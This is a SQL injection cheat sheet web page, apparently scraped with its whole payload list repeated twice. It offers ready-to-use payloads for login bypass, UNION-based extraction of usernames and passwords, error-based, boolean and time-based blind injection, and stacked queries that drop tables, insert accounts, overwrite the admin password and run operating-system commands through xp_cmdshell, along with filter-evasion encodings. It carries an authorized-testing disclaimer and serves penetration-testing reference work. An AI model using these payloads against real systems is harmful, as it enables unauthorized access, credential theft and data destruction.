Cheatsheet

SQL Injection

Common SQL injection payloads for penetration testing.

Educational purposes only. Only test on systems you own or have explicit authorization.

Basic OR bypass

' OR '1'='1

OR bypass with comment

' OR '1'='1'--

OR bypass with block comment

' OR '1'='1'/*

Comment out password check

admin'--

MySQL comment bypass

' OR 1=1#

Parenthesis bypass

') OR ('1'='1

Empty string comparison

' OR ''='

Find number of columns

' UNION SELECT NULL--

2 columns

' UNION SELECT NULL,NULL--

3 columns

' UNION SELECT NULL,NULL,NULL--

Find visible columns

' UNION SELECT 1,2,3--

Extract credentials

' UNION SELECT username,password FROM users--

List tables

' UNION SELECT table_name,NULL FROM information_schema.tables--

List columns

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

MSSQL error extraction

' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--

MySQL EXTRACTVALUE

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--

MySQL error based

' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

PostgreSQL CAST error

' AND 1=CAST((SELECT version()) AS int)--

True condition

' AND 1=1--

False condition

' AND 1=2--

Character extraction

' AND SUBSTRING(username,1,1)='a'--

Check table exists

' AND (SELECT COUNT(*) FROM users)>0--

Database name length

' AND LENGTH(database())>5--

MySQL sleep

' AND SLEEP(5)--

MSSQL delay

'; WAITFOR DELAY '0:0:5'--

PostgreSQL sleep

' AND pg_sleep(5)--

Conditional sleep

' AND IF(1=1,SLEEP(5),0)--

Extract with timing

' OR IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

Drop table (dangerous!)

'; DROP TABLE users--

Insert user

'; INSERT INTO users VALUES('hacker','password')--

Update password

'; UPDATE users SET password='hacked' WHERE username='admin'--

MSSQL command execution

'; EXEC xp_cmdshell('whoami')--

Mixed case

' oR '1'='1

Comment bypass spaces

'/**/OR/**/1=1--

Hex encoding

' OR 0x31=0x31--

CHAR encoding

' OR CHAR(49)=CHAR(49)--

URL encoded spaces

'%20OR%201=1--

MySQL version comment

' OR 1/*!50000=*/1--

MSSQL version

' AND @@version--

MySQL/PostgreSQL version

' AND version()--

Oracle version

' UNION SELECT banner FROM v$version--

SQLite version

' UNION SELECT sqlite_version()--

Cheatsheet

SQL Injection

Common SQL injection payloads for penetration testing.

Educational purposes only. Only test on systems you own or have explicit authorization.

Basic OR bypass

' OR '1'='1

OR bypass with comment

' OR '1'='1'--

OR bypass with block comment

' OR '1'='1'/*

Comment out password check

admin'--

MySQL comment bypass

' OR 1=1#

Parenthesis bypass

') OR ('1'='1

Empty string comparison

' OR ''='

Find number of columns

' UNION SELECT NULL--

2 columns

' UNION SELECT NULL,NULL--

3 columns

' UNION SELECT NULL,NULL,NULL--

Find visible columns

' UNION SELECT 1,2,3--

Extract credentials

' UNION SELECT username,password FROM users--

List tables

' UNION SELECT table_name,NULL FROM information_schema.tables--

List columns

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

MSSQL error extraction

' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--

MySQL EXTRACTVALUE

' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--

MySQL error based

' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

PostgreSQL CAST error

' AND 1=CAST((SELECT version()) AS int)--

True condition

' AND 1=1--

False condition

' AND 1=2--

Character extraction

' AND SUBSTRING(username,1,1)='a'--

Check table exists

' AND (SELECT COUNT(*) FROM users)>0--

Database name length

' AND LENGTH(database())>5--

MySQL sleep

' AND SLEEP(5)--

MSSQL delay

'; WAITFOR DELAY '0:0:5'--

PostgreSQL sleep

' AND pg_sleep(5)--

Conditional sleep

' AND IF(1=1,SLEEP(5),0)--

Extract with timing

' OR IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

Drop table (dangerous!)

'; DROP TABLE users--

Insert user

'; INSERT INTO users VALUES('hacker','password')--

Update password

'; UPDATE users SET password='hacked' WHERE username='admin'--

MSSQL command execution

'; EXEC xp_cmdshell('whoami')--

Mixed case

' oR '1'='1

Comment bypass spaces

'/**/OR/**/1=1--

Hex encoding

' OR 0x31=0x31--

CHAR encoding

' OR CHAR(49)=CHAR(49)--

URL encoded spaces

'%20OR%201=1--

MySQL version comment

' OR 1/*!50000=*/1--

MSSQL version

' AND @@version--

MySQL/PostgreSQL version

' AND version()--

Oracle version

' UNION SELECT banner FROM v$version--

SQLite version

' UNION SELECT sqlite_version()--

SQL Injection

Authentication Bypass

Union Based

Error Based

Blind Boolean

Time Based

Stacked Queries

Filter Bypass

Database Fingerprinting

SQL Injection

Authentication Bypass

Union Based

Error Based

Blind Boolean

Time Based

Stacked Queries

Filter Bypass

Database Fingerprinting